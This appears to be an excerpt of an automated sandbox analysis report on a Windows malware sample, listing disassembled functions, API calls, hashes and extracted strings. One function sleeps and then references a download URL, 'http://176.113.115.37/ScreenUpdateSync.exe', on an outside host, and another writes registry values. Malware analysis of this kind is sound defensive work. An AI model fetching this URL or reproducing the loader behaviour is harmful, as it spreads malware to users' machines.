                                                        • Opcode ID: d6927ac8dcf44b0011b1dce344e42bafe9dfab0a11997840a9f38d6492e0eb02
                                                        • Instruction ID: 257e808548a25f0c421a3fe296c20495207b494aef35f76eb7bec397418e7454
                                                        • Opcode Fuzzy Hash: d6927ac8dcf44b0011b1dce344e42bafe9dfab0a11997840a9f38d6492e0eb02
                                                        • Instruction Fuzzy Hash: 1801F9B1E0021C5ADB24FA25EC46BEF7768AB41304F0402FFA705E31C1D9785E45CA88
                                                        Function 0042E134 Relevance: 4.6, APIs: 3, Instructions: 54threadCOMMONLIBRARYCODE
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 391 42e134-42e13f 392 42e141-42e153 call 42eae9 call 42a5bd 391->392 393 42e155-42e168 call 42e0eb 391->393 409 42e1a5-42e1a8 392->409 398 42e196 393->398 399 42e16a-42e187 CreateThread 393->399 403 42e198-42e1a4 call 42e05d 398->403 401 42e1a9-42e1ae 399->401 402 42e189-42e195 GetLastError call 42eab3 399->402 407 42e1b0-42e1b3 401->407 408 42e1b5-42e1b7 401->408 402->398 403->409 407->408 408->403
                                                        APIs
                                                        • CreateThread.KERNEL32(?,?,Function_0002DFE0,00000000,?,?), ref: 0042E17D
                                                        • GetLastError.KERNEL32(?,?,?,?,?,0040CF33,00000000,00000000,?,?,00000000,?), ref: 0042E189
                                                        • __dosmaperr.LIBCMT ref: 0042E190
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: CreateErrorLastThread__dosmaperr
                                                        • String ID:
                                                        • API String ID: 2744730728-0
                                                        • Opcode ID: f788247bfe16cd787040539d6f1c9311eafedbd5b023f877c643640da45ad27a
                                                        • Instruction ID: e33ff4e630afc97a712763e24a24b73512c1ee0121ef7b9dc61686095db8a569
                                                        • Opcode Fuzzy Hash: f788247bfe16cd787040539d6f1c9311eafedbd5b023f877c643640da45ad27a
                                                        • Instruction Fuzzy Hash: 7F01D236600229ABDB119FA3FC05AAF3B69EF81360F50013AF91582210DB358921DBA8
                                                        Function 00434775 Relevance: 4.6, APIs: 3, Instructions: 50COMMONLIBRARYCODE
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 412 434775-43478d call 439941 415 4347a0-4347b6 SetFilePointerEx 412->415 416 43478f-434794 call 42eae9 412->416 418 4347c7-4347d1 415->418 419 4347b8-4347c5 GetLastError call 42eab3 415->419 421 43479a-43479e 416->421 420 4347d3-4347e8 418->420 418->421 419->421 425 4347ed-4347f2 420->425 421->425
                                                        APIs
                                                        • SetFilePointerEx.KERNEL32(00000000,00000000,0040DDFA,00000000,00000002,0040DDFA,00000000,?,?,?,00434824,00000000,00000000,0040DDFA,00000002), ref: 004347AE
                                                        • GetLastError.KERNEL32(?,00434824,00000000,00000000,0040DDFA,00000002,?,0042C181,?,00000000,00000000,00000001,?,0040DDFA,?,0042C236), ref: 004347B8
                                                        • __dosmaperr.LIBCMT ref: 004347BF
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: ErrorFileLastPointer__dosmaperr
                                                        • String ID:
                                                        • API String ID: 2336955059-0
                                                        • Opcode ID: 0f8939188b6fdc8a7da50d1b405e1129083f9e2b96a50d0a3cd5949e7845d65d
                                                        • Instruction ID: 3f4161a45120eee3ca6c804ab5e0c8b7ff266a4415271cac2496bd2984e95623
                                                        • Opcode Fuzzy Hash: 0f8939188b6fdc8a7da50d1b405e1129083f9e2b96a50d0a3cd5949e7845d65d
                                                        • Instruction Fuzzy Hash: CC016836610114ABCB159FAADC058EF7B29EFCA730F24030AF814872C0EB74AD418794
                                                        Function 00402BCD Relevance: 4.5, APIs: 3, Instructions: 41registryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 426 402bcd-402bf9 RegCreateKeyExW 427 402bfb-402c0d RegSetValueExW 426->427 428 402c0f-402c12 426->428 427->428 429 402c14-402c17 RegCloseKey 428->429 430 402c1d-402c23 428->430 429->430
                                                        APIs
                                                        • RegCreateKeyExW.KERNEL32(80000001,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BEF
                                                        • RegSetValueExW.KERNEL32(?,?,00000000,00000001,?,00000004,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402C07
                                                        • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402C17
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: CloseCreateValue
                                                        • String ID:
                                                        • API String ID: 1818849710-0
                                                        • Opcode ID: 17a0f39c5dea863e0681c067e94205fb1cf9212befe975e377a74504568b03c9
                                                        • Instruction ID: 5f9d8f05081ab8e61a544dd9ed380a1f0a89feb258115cbe41ff1dcf5e2af099
                                                        • Opcode Fuzzy Hash: 17a0f39c5dea863e0681c067e94205fb1cf9212befe975e377a74504568b03c9
                                                        • Instruction Fuzzy Hash: 75F0B4B650011CFFEB214F94DD89DAFBA7CEB417E9F100175FA01B2150D6B14E009664
                                                        Function 0042E094 Relevance: 4.5, APIs: 3, Instructions: 31threadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 431 42e094-42e0a1 call 431f7e 434 42e0a3-42e0a6 ExitThread 431->434 435 42e0ac-42e0b4 431->435 435->434 436 42e0b6-42e0ba 435->436 437 42e0c1-42e0c7 436->437 438 42e0bc call 435516 436->438 439 42e0d4-42e0da 437->439 440 42e0c9-42e0cb 437->440 438->437 439->434 443 42e0dc-42e0de 439->443 440->439 442 42e0cd-42e0ce CloseHandle 440->442 442->439 443->434 444 42e0e0-42e0ea FreeLibraryAndExitThread 443->444
                                                        APIs
                                                          • Part of subcall function 00431F7E: GetLastError.KERNEL32(?,?,?,0042EAEE,00434D9C,?,00431F28,00000001,00000364,?,0042E005,00457910,00000010), ref: 00431F83
                                                          • Part of subcall function 00431F7E: _free.LIBCMT ref: 00431FB8
                                                          • Part of subcall function 00431F7E: SetLastError.KERNEL32(00000000), ref: 00431FEC
                                                        • ExitThread.KERNEL32 ref: 0042E0A6
                                                        • CloseHandle.KERNEL32(?,?,?,0042E1C6,?,?,0042E03D,00000000), ref: 0042E0CE
                                                        • FreeLibraryAndExitThread.KERNEL32(?,?,?,?,0042E1C6,?,?,0042E03D,00000000), ref: 0042E0E4
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: ErrorExitLastThread$CloseFreeHandleLibrary_free
                                                        • String ID:
                                                        • API String ID: 1198197534-0
                                                        • Opcode ID: 358fd455719f577d8bc93a3d3127ed53d65e98e9d00355e3dd6338ab7ece4e02
                                                        • Instruction ID: 02d263aed51cb6b3bee4cffa2fb4446158e609bbc081d0db7e94150c61e2e04c
                                                        • Opcode Fuzzy Hash: 358fd455719f577d8bc93a3d3127ed53d65e98e9d00355e3dd6338ab7ece4e02
                                                        • Instruction Fuzzy Hash: 8FF05E302006347BDB356F27E808A5B3AA8AF05764F484726B924C37A1D7B8DD828698
                                                        Function 0043CFEB Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36COMMONLIBRARYCODE
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 445 43cfeb-43d005 call 43f961 448 43d007-43d00a 445->448 449 43d00c-43d024 call 43d05c 445->449 450 43d038-43d03b 448->450 452 43d029-43d037 call 43348a 449->452 452->450
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: _free
                                                        • String ID: 'C
                                                        • API String ID: 269201875-3508614867
                                                        • Opcode ID: dcff01ba0718bc25fbadba801be0e76f759b5211c2d86b2f90a3e61a906836b7
                                                        • Instruction ID: ac23cf383b269f77c0b068b48fc7cf8c71372a03a023b6a8bdb9567da4463856
                                                        • Opcode Fuzzy Hash: dcff01ba0718bc25fbadba801be0e76f759b5211c2d86b2f90a3e61a906836b7
                                                        • Instruction Fuzzy Hash: D0F09A32810008BBCF155E96EC01DDF3B6AEF89338F10115AFA1492150DA3A8A22ABA4
                                                        Function 004023BA Relevance: 3.1, APIs: 2, Instructions: 129windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • DefWindowProcW.USER32(?,?,?,?), ref: 004023E1
                                                        • PostQuitMessage.USER32(00000000), ref: 00402583
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: MessagePostProcQuitWindow
                                                        • String ID:
                                                        • API String ID: 3873111417-0
                                                        • Opcode ID: 1f3d487c3c03d627e5903ad7b0a4cc32456bcc0014a944db875e3b1801701b52
                                                        • Instruction ID: f7540e8b067131d9abd8b97533556e050534cde561c52fa9c46de49641595c4f
                                                        • Opcode Fuzzy Hash: 1f3d487c3c03d627e5903ad7b0a4cc32456bcc0014a944db875e3b1801701b52
                                                        • Instruction Fuzzy Hash: 91410C15A64384A9E730EFA5BD15B2537B0EF64762F10253BE528DB2F2E3B58580C30E
                                                        Function 0040155A Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 105sleepCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • Sleep.KERNEL32(0000215D), ref: 00401562
                                                          • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010C1
                                                          • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010DD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: _wcslen$Sleep
                                                        • String ID: http://176.113.115.37/ScreenUpdateSync.exe
                                                        • API String ID: 3358372957-2681926500
                                                        • Opcode ID: ddfdc33ddaf944cd93ee91cdfc7456df5d56f708170e8b920f6740c66972ae79
                                                        • Instruction ID: a225884332a17bf582b8fadba65ee921369c39f73c189ef0fca73ca0a6338174
                                                        • Opcode Fuzzy Hash: ddfdc33ddaf944cd93ee91cdfc7456df5d56f708170e8b920f6740c66972ae79
                                                        • Instruction Fuzzy Hash: 6E318C15A6538094E230CFA5BC66B252330FFA8752F51253BD60CCB2F2E7A19583C71E
                                                        Function 004341A6 Relevance: 1.7, APIs: 1, Instructions: 151COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 77dff8414438c132d9b1b222249ac9577754d763359ce41167806e2a442978e4
                                                        • Instruction ID: c13f0aaa9ffca533a2c3afb5b433fd4ee60c85f45f94f80d5c2ee7b15d17ea23
                                                        • Opcode Fuzzy Hash: 77dff8414438c132d9b1b222249ac9577754d763359ce41167806e2a442978e4
                                                        • Instruction Fuzzy Hash: 2051C331A00218AFDB10DF59C840BEA7BA1EBC9364F19919AF809AB391C735FD42CB54
                                                        Function 004036C4 Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: __fread_nolock
                                                        • String ID:
                                                        • API String ID: 2638373210-0
                                                        • Opcode ID: 2283a06a2fad5c3ceff95e800cd0e8c9cbaa35fb85d12550c614d86d70b6a1f3
                                                        • Instruction ID: b9260250dbf28f9d15b3c818f63209514cdecf0a47afbf9c4decfe0e49894dcf
                                                        • Opcode Fuzzy Hash: 2283a06a2fad5c3ceff95e800cd0e8c9cbaa35fb85d12550c614d86d70b6a1f3
                                                        • Instruction Fuzzy Hash: 95316AF5604716AFC710CF2AC880A1ABFA9BF84351F04C53EF84497791D739DA548B8A
                                                        Function 00402843 Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00402926
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: Ios_base_dtorstd::ios_base::_
                                                        • String ID:
                                                        • API String ID: 323602529-0
                                                        • Opcode ID: ac15786566c7c12d7d6604bc2b543ac292efb61edc09540775426cdd15f97b46
                                                        • Instruction ID: 06a190b1af6bffd0b30009583d7beab466b865d2b1cdf6d05da26eaaeda62aaf
                                                        • Opcode Fuzzy Hash: ac15786566c7c12d7d6604bc2b543ac292efb61edc09540775426cdd15f97b46
                                                        • Instruction Fuzzy Hash: E3312CB4D002199BDB04EFA5C891AEDBBB4BF58304F5085AEE415B3681DB786A48CF54
                                                        Function 00403CE7 Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: H_prolog3_catch
                                                        • String ID:
                                                        • API String ID: 3886170330-0
                                                        • Opcode ID: 8f7dc48dcb05c21fbbcda5fcf12e76a98b4592d37682d1b18d39cb0d63f71a47
                                                        • Instruction ID: 130d185d73aa858ab00e75432ddc36e19440830dd378bf412e93c481dd82f4d6
                                                        • Opcode Fuzzy Hash: 8f7dc48dcb05c21fbbcda5fcf12e76a98b4592d37682d1b18d39cb0d63f71a47
                                                        • Instruction Fuzzy Hash: 98215870A00245EFCB11DF55C480EAEBBB5BF48704F2480AEE805AB391C778AE50CB94
                                                        Function 004327A5 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: __wsopen_s
                                                        • String ID:
                                                        • API String ID: 3347428461-0
                                                        • Opcode ID: ebde34e331f36d73ae22f6b7be2bf13c9f524ff7c3251c4fe3554b52cc0156cf
                                                        • Instruction ID: 247e0a556512b48f7b921b083965eca1f7392b8622cfa12ec24d1c2ccd616764
                                                        • Opcode Fuzzy Hash: ebde34e331f36d73ae22f6b7be2bf13c9f524ff7c3251c4fe3554b52cc0156cf
                                                        • Instruction Fuzzy Hash: B511067590420AAFCB05DF58E94199A7BF4EF48314F10406AF809AB311D671EA158BA9
                                                        Function 00434D4A Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00431F28,00000001,00000364,?,0042E005,00457910,00000010), ref: 00434D8B
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: AllocateHeap
                                                        • String ID:
                                                        • API String ID: 1279760036-0
                                                        • Opcode ID: 480f1ce45d14040ee3ea33e8ab56172a2f2fc49c365442aad9b5ef05e54ba84d
                                                        • Instruction ID: 4bc222232dd1d9c16a782512db5beef15d0f76b15494923fec8dca0d2a195a63
                                                        • Opcode Fuzzy Hash: 480f1ce45d14040ee3ea33e8ab56172a2f2fc49c365442aad9b5ef05e54ba84d
                                                        • Instruction Fuzzy Hash: 10F0BB31600220A69B211B52DC01BAB3B4CAFC5770F545027A804D6190CA28FD01829D
                                                        Function 004336C7 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • RtlAllocateHeap.NTDLL(00000000,0040D895,00000000,?,004267BE,00000002,00000000,00000000,00000000,?,0040CD46,0040D895,00000004,00000000,00000000,00000000), ref: 004336F9
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: AllocateHeap
                                                        • String ID:
                                                        • API String ID: 1279760036-0
                                                        • Opcode ID: 94f750592cee1f743f5fc95d96a6c8fbd485f7a37a0c4c452716bcfbad1791b8
                                                        • Instruction ID: 8b2e0ce5f68243881f48833c9379da8a786ec54fae66de81054fb87b7da3eb6a
                                                        • Opcode Fuzzy Hash: 94f750592cee1f743f5fc95d96a6c8fbd485f7a37a0c4c452716bcfbad1791b8
                                                        • Instruction Fuzzy Hash: C9E0E5B1A046207ADA302FA65C06B5B3A48AF497B2F056133FC0592290FF2CDE4081AD
                                                        Function 0040FB31 Relevance: 1.5, APIs: 1, Instructions: 28COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 004103E7
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: Exception@8Throw
                                                        • String ID:
                                                        • API String ID: 2005118841-0
                                                        • Opcode ID: d3dc0e7b799cf4addcb5e854e1870d6270b50bfba89a80199028074021f20c37
                                                        • Instruction ID: f0ff8e4b9f7cc01ea46f57855d09a1922a3c0907516a33a9cf8cca3f22e82038
                                                        • Opcode Fuzzy Hash: d3dc0e7b799cf4addcb5e854e1870d6270b50bfba89a80199028074021f20c37
                                                        • Instruction Fuzzy Hash: E8E02B3050030D76CB107A65FC1195E33381A00328F90413BBC24A14D1EF78F99D858D
                                                        Function 0043CD2A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateFileW.KERNEL32(00000000,00000000,?,0043D105,?,?,00000000,?,0043D105,00000000,0000000C), ref: 0043CD47
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        • Opcode ID: c1825962b9e2d68b99604ae1ec91ea351fd51148a2f332f138c69e8dc7c90181
                                                        • Instruction ID: f5cec35e3468c2ebfedbe18043dc9de9c020ce50a8bef62643be49baa2ffa0a5
                                                        • Opcode Fuzzy Hash: c1825962b9e2d68b99604ae1ec91ea351fd51148a2f332f138c69e8dc7c90181
                                                        • Instruction Fuzzy Hash: DCD06C3200014DBBDF028F84DC06EDA3BAAFB48714F014150BA1856020C732E921AB95

                                                        Non-executed Functions

                                                        Function 0043B78E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0043BAAD,?,00000000), ref: 0043B827
                                                        • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0043BAAD,?,00000000), ref: 0043B850
                                                        • GetACP.KERNEL32(?,?,0043BAAD,?,00000000), ref: 0043B865
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: InfoLocale
                                                        • String ID: ACP$OCP
                                                        • API String ID: 2299586839-711371036
                                                        • Opcode ID: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                        • Instruction ID: 27c07f44f4bcc92ed5b0bc77b7acbdc5106fd624739a874395cd08b17b137cf5
                                                        • Opcode Fuzzy Hash: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                        • Instruction Fuzzy Hash: 39210336A00104A6E738AF14C801B9773AAEF58F64F56942BEB0AD7310E736DE01C3D8
                                                        Function 0043B962 Relevance: 7.7, APIs: 5, Instructions: 188COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00431EFA: GetLastError.KERNEL32(?,?,0042E005,00457910,00000010), ref: 00431EFE
                                                          • Part of subcall function 00431EFA: _free.LIBCMT ref: 00431F31
                                                          • Part of subcall function 00431EFA: SetLastError.KERNEL32(00000000), ref: 00431F72
                                                          • Part of subcall function 00431EFA: _free.LIBCMT ref: 00431F59
                                                          • Part of subcall function 00431EFA: SetLastError.KERNEL32(00000000), ref: 00431F66
                                                        • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0043BA6E
                                                        • IsValidCodePage.KERNEL32(00000000), ref: 0043BAC9
                                                        • IsValidLocale.KERNEL32(?,00000001), ref: 0043BAD8
                                                        • GetLocaleInfoW.KERNEL32(?,00001001,004307D5,00000040,?,004308F5,00000055,00000000,?,?,00000055,00000000), ref: 0043BB20
                                                        • GetLocaleInfoW.KERNEL32(?,00001002,00430855,00000040), ref: 0043BB3F
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser
                                                        • String ID:
                                                        • API String ID: 2287132625-0
                                                        • Opcode ID: a50431d0c3642f69d47dbab6daefb570278e327c2e745941eee8886a4e92d2d5
                                                        • Instruction ID: 67f71bbb56b82b0218cba6ea78e0e4499e3cf24bce0f2bcc9fbcefe2be7f4072
                                                        • Opcode Fuzzy Hash: a50431d0c3642f69d47dbab6daefb570278e327c2e745941eee8886a4e92d2d5
                                                        • Instruction Fuzzy Hash: DC517371D00609ABDB10EFA5CC45BBF77B8EF4C701F14556BEA40E7250EB789A048BA9
                                                        Function 0043B02A Relevance: 6.2, APIs: 4, Instructions: 236COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00431EFA: GetLastError.KERNEL32(?,?,0042E005,00457910,00000010), ref: 00431EFE
                                                          • Part of subcall function 00431EFA: _free.LIBCMT ref: 00431F31
                                                          • Part of subcall function 00431EFA: SetLastError.KERNEL32(00000000), ref: 00431F72
                                                        • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,004307DC,?,?,?,?,00430233,?,00000004), ref: 0043B10C
                                                        • _wcschr.LIBVCRUNTIME ref: 0043B19C
                                                        • _wcschr.LIBVCRUNTIME ref: 0043B1AA
                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,004307DC,00000000,004308FC), ref: 0043B24D
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_free
                                                        • String ID:
                                                        • API String ID: 2444527052-0
                                                        • Opcode ID: 235cd7c9c97d69f00393a381e4b6a272d6827e4b9def7e09cf33ed6baaba58e2
                                                        • Instruction ID: 5761a74378df300ed92098e1ccfc665780a6f2e5d92530a12aea1ed3de9efe0d
                                                        • Opcode Fuzzy Hash: 235cd7c9c97d69f00393a381e4b6a272d6827e4b9def7e09cf33ed6baaba58e2
                                                        • Instruction Fuzzy Hash: BF610C71600205AADB25AB35DC46BBB73A8EF0C744F14256FFA05DB281EB78DA40C7D9
                                                        Function 004351E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 37COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,00430233,?,00000004), ref: 00435233
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: InfoLocale
                                                        • String ID: 11@$GetLocaleInfoEx
                                                        • API String ID: 2299586839-1075713910
                                                        • Opcode ID: 1dc130b9c5a187b3ffa5c8ddbc84a9ec177ca7c052edae5696fe3086fb7fd6c3
                                                        • Instruction ID: 0b6d0ab79e82c81e80324b5502c8e0aaa0a052425b201476cea76cb6f5b2798d
                                                        • Opcode Fuzzy Hash: 1dc130b9c5a187b3ffa5c8ddbc84a9ec177ca7c052edae5696fe3086fb7fd6c3
                                                        • Instruction Fuzzy Hash: 10F0BB31680318BBDB11AF51DC02F6F7B65EF19B12F10416BFC0566290DA759D20EA9E
                                                        Function 0043BBE1 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: HeapProcess
                                                        • String ID:
                                                        • API String ID: 54951025-0
                                                        • Opcode ID: b4ea6d87a370488c09fcd641e95d7d939a449e6ed78a54530fece2258cf524d5
                                                        • Instruction ID: 646215492ee1b006629ac518ce4a11708067c45d14fae9e363609ac2be79142b
                                                        • Opcode Fuzzy Hash: b4ea6d87a370488c09fcd641e95d7d939a449e6ed78a54530fece2258cf524d5
                                                        • Instruction Fuzzy Hash: 3FA02230A00300EF8380CF30AE0830E3BE8BE03AC3B008238A002C3030EB30C0808B08
                                                        Function 00402116 Relevance: 49.2, APIs: 27, Strings: 1, Instructions: 205COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • DefWindowProcW.USER32(?,00000014,?,?), ref: 00402151
                                                        • GetClientRect.USER32(?,?), ref: 00402166
                                                        • GetDC.USER32(?), ref: 0040216D
                                                        • CreateSolidBrush.GDI32(00646464), ref: 00402180
                                                        • SelectObject.GDI32(00000000,00000000), ref: 00402194
                                                        • CreatePen.GDI32(00000001,00000001,00FFFFFF), ref: 0040219F
                                                        • SelectObject.GDI32(00000000,00000000), ref: 004021AD
                                                        • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 004021C0
                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004021CB
                                                        • MulDiv.KERNEL32(00000008,00000000), ref: 004021D4
